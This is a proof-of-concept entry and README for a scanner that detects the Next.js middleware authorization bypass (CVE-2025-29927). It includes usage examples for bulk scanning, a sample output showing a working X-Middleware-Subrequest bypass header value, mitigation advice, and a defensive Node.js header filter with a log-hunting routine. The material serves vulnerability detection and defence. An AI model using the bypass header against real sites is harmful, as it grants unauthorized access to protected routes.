POC details: 538006495b78c43a07acbba493be1aecbc2a26e4

Source
Related vulnerability
Title: Next.js security vulnerability (CVE-2025-29927)
Description: Next.js is an open-source React framework from Vercel. Next.js versions before 14.2.25 and before 15.2.3 contain a security vulnerability: when an authorization check is performed in middleware, it can be bypassed.
Description
Next.js Middleware Bypass Scanner
Introduction
# CVE-2025-29927

## Next.js Middleware Bypass Scanner (CVE-2025-29927)

This repository is a scanner for detecting the Next.js middleware bypass vulnerability (CVE-2025-29927), which affects Next.js versions 11.1.4 through 15.2.2. The vulnerability is rated critical because an attacker can bypass security controls implemented in middleware simply by sending a specially crafted HTTP header.

## About the Vulnerability

The Next.js middleware bypass vulnerability (CVE-2025-29927) allows an attacker to circumvent authorization controls by sending a crafted `X-Middleware-Subrequest` header. The header causes the middleware, and therefore any authorization check it performs, to be skipped, which can lead to unauthorized access to protected routes and resources.

**CVSS Score:** 9.1 (Critical)

## Features

- Fast concurrent scanning of multiple targets
- SSL certificate verification bypass option for IP-based scanning
- Silent mode for automation and focused output
- Detailed vulnerability information (status codes, bypass headers)
- Endpoint discovery for comprehensive testing

## Installation

```bash
# Clone the repository
git clone https://github.com/gotr00t0day/CVE-2025-29927.git
cd CVE-2025-29927

# Install requirements
pip install -r requirements.txt
```

## Usage

```bash
python CVE-2025-29927.py [-h] [-t TARGET] [-f FILE] [-c CONCURRENCY] [-k] [-s]
```

### Command Line Arguments

- `-t, --target`: Single target to scan (e.g., example.com or https://example.com)
- `-f, --file`: File containing list of targets (one per line)
- `-c, --concurrency`: Number of concurrent scans (default: 5)
- `-k, --insecure`: Disable SSL certificate verification (useful for IP addresses)
- `-s, --silent`: Silent mode - only show vulnerable targets

### Examples

Scan a single target:
```bash
python CVE-2025-29927.py -t example.com
```

Scan multiple targets from a file:
```bash
python CVE-2025-29927.py -f targets.txt
```

Scan with SSL verification disabled:
```bash
python CVE-2025-29927.py -t 192.168.1.1 -k
```

Automated scanning with silent mode:
```bash
python CVE-2025-29927.py -f targets.txt -k -s
```

Scan with a custom Header:
```bash
python3 CVE-2025-29927.py -t target -k -s -H "middleware"
```

## Output

For vulnerable targets, the scanner displays:
- The vulnerable endpoint
- Original status code
- Bypassed status code
- The bypass header used for successful exploitation

Example output:
```
[VULNERABLE] https://example.com - Endpoint /admin can be bypassed
  Original status: 401
  Bypassed status: 200
  Bypass header: X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
```

## Mitigation

To mitigate this vulnerability:
1. Upgrade to Next.js 14.2.25, 15.2.3 or later
2. If upgrading is not possible, block the `X-Middleware-Subrequest` header at your WAF or server level
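The server-level blocking in step 2, and the header described under About the Vulnerability, as an added defensive example in Node.js that is not the scanner's own code: a request filter that rejects or strips the header before it can reach Next.js, plus a hunt over access logs for past attempts. The JSON-lines log format, the `SAMPLE_LOG` records and every function name are constructed for this example.

```javascript
// Defensive filter for the X-Middleware-Subrequest header (added example, not
// the scanner's code). Log format below is constructed: JSON lines with
// "path", "status" and "headers".
const BYPASS_HEADER = 'x-middleware-subrequest';

// Header names are case-insensitive; Node lowercases them on IncomingMessage,
// but proxies and log exports may not, so always compare in lower case.
function bypassHeaderKey(headers) {
  return Object.keys(headers || {}).find((k) => k.toLowerCase() === BYPASS_HEADER);
}

function hasBypassHeader(headers) {
  return bypassHeaderKey(headers) !== undefined;
}

// For a reverse proxy in front of Next.js: copy of the header map with the
// bypass header removed, so the backend never sees it.
function stripBypassHeader(headers) {
  return Object.fromEntries(
    Object.entries(headers).filter(([k]) => k.toLowerCase() !== BYPASS_HEADER));
}

// Usable as http.createServer(requestHandler): refuse the request before it
// can reach middleware. Returns the status code that was sent.
function requestHandler(req, res) {
  const status = hasBypassHeader(req.headers) ? 403 : 200;
  res.writeHead(status, { 'content-type': 'text/plain' });
  res.end(status === 403 ? 'forbidden' : 'ok');
  return status;
}

// Hunt: return log records that carried the header. A 200 on a protected
// path marks a successful bypass; malformed lines are skipped, not fatal.
function findBypassAttempts(lines) {
  const hits = [];
  for (const line of lines) {
    let rec;
    try { rec = JSON.parse(line); } catch { continue; }
    const key = bypassHeaderKey(rec && rec.headers);
    if (key !== undefined) hits.push({ path: rec.path, status: rec.status, value: rec.headers[key] });
  }
  return hits;
}
// Constructed sample log lines (not real traffic).
const SAMPLE_LOG = [
  '{"path":"/admin","status":200,"headers":{"X-Middleware-Subrequest":"middleware"}}',
  '{"path":"/","status":200,"headers":{"user-agent":"curl/8.0"}}',
  'not a json line',
];
```

Blocking at the proxy covers every framework version behind it; the log hunt is what tells you whether the header was ever used against a protected path before the fix was applied.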

## Disclaimer

This tool is provided for security research and defensive purposes only. Always obtain proper authorization before scanning any systems you don't own. The authors are not responsible for any misuse of this tool.

## License

MIT 
File snapshot

```
[4.0K] /data/pocs/538006495b78c43a07acbba493be1aecbc2a26e4
├── [7.4K] CVE-2025-29927.py
├── [3.0K] README.md
└── [  60] requirements.txt

0 directories, 3 files
```